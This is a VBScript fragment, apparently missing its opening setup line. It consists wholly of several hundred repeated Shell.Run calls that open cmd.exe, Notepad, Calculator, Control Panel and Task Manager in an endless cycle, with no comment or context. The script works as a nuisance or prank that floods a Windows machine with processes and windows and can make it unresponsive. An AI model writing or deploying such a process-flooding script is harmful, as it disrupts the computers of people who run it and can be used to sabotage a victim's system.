objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
